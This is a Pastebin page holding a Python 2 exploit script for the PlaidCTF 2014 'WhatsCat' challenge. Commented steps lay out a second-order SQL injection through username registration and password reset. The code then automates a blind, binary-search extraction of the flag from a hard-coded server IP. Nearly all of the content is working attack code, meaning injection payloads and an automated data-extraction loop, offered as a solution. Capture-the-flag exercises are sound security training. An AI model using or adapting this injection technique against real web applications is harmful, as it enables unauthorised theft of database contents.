Need a unique gift idea?
A Pastebin account makes a great Christmas gift
SHARE
TWEET

PPP's WhatsCat Challenge Exploit by @ngocdh

huyngoc Apr 13th, 2014 871 Never
Upgrade to PRO!
ENDING IN00days00hours00mins00secs
 
  1. #PPP's WhatsCat Challenge Exploit by @ngocdh
  2. #http://play.plaidctf.com/files/whatscat-59b6f6c9b192457fa3e7d2253c8b24c9.tar.bz2
  3. #
  4. #Step 1 : Register with username "hn"
  5. #Step 2 : Register with username "hn' and 21=(select length(flag) from flag)#"
  6. #Step 3 : Reset password of the 2nd user
  7. #Step 4 : Log in with username hn and original password. If password is invalid then the condition is true (21 = length(flag))
  8. #
  9. #The flag table/column and length were found manually
  10. #This code extracts only the flag
  11.  
  12. import urllib2
  13. import string
  14. import random
  15.  
  16. def idgen(size=6, chars=string.ascii_uppercase + string.digits):
  17.   return ''.join(random.choice(chars) for _ in range(size))
  18.  
  19. def check(pos,d,u):
  20.   id = idgen() + "hn"
  21.  
  22.   query = id + "'%20and%20(select%20ascii(substr(flag,"+pos+",1))from%20flag)%20between%20"+d+"%20and%20"+u+"#"
  23.  
  24.   url = "http://54.196.116.77/index.php?page=login"
  25.  
  26.   data_reg = "name="+id+"&pass=hn&email=hn&register=Register"
  27.   data_reg2 = "name="+query+"&pass=hn&email=hn&register=Register"
  28.   data_reset = "name="+query+"&reset=Forgot+Password&pass=&email="
  29.   data_login = "name="+id+"&pass=hn&login=Login&email="
  30.  
  31.   a=urllib2.urlopen(url,data_reg).read()
  32.   a=urllib2.urlopen(url,data_reg2).read()
  33.   b=urllib2.urlopen(url,data_reset).read()
  34.   c=urllib2.urlopen(url,data_login).read()
  35.  
  36.   if c.find("Welcome back")>0 and c.find("invalid")<0:
  37.     return 0
  38.   else:
  39.     return 1
  40.  
  41. res = ""
  42. for i in range(1,22):
  43.   p=0
  44.   q=255
  45.   for x in range(0,8):
  46.     n = (p+q)/2
  47.     temp = check(str(i),str(p),str(n))
  48.     q = n if temp==1 else q
  49.     p = n+1 if temp==0 else p
  50.   res = res + chr(p)
  51.   print res
RAW Paste Data
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy. OK, I Understand
 
Top